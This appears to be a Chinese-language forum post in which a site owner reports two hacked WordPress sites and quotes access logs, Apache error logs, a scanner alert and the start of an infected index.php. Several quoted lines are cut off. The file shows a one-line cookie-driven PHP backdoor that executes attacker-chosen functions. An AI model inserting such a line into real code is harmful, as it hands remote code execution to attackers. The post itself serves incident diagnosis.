我有两个网站看起来被黑了。我检查了访问日志并找到了以下日志条目:
"GET / HTTP/1.1" 200 20213 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
"GET /index.php?cperpage=1 HTTP/1.1" 301 0 "http://example.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10
最近,其中一个WP网站文件删除了"CXS扫描器“,并检测到根文件夹中的所有文件为
index.php' Known exploit = [Fingerprint Match] [PHP COOKIE Exploit [P1036]]
当我将检测到的cookie漏洞文件与旧版本进行比较时,我注意到该文件中添加了额外的代码行:
检测到的index.php
<?php
if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);
/**
* Front to t
我刚刚在/var/log/apache2/error.log中看到了一系列新的错误
[Thu May 07 17:12:35.433760 2015] [:error] [pid 3488] [client 190.79.132.215:51660] script '/var/www/html/r.php' not found or unable to stat
[Thu May 07 17:12:38.066293 2015] [:error] [pid 3471] [client 190.79.132.215:51679] script '/var/www/html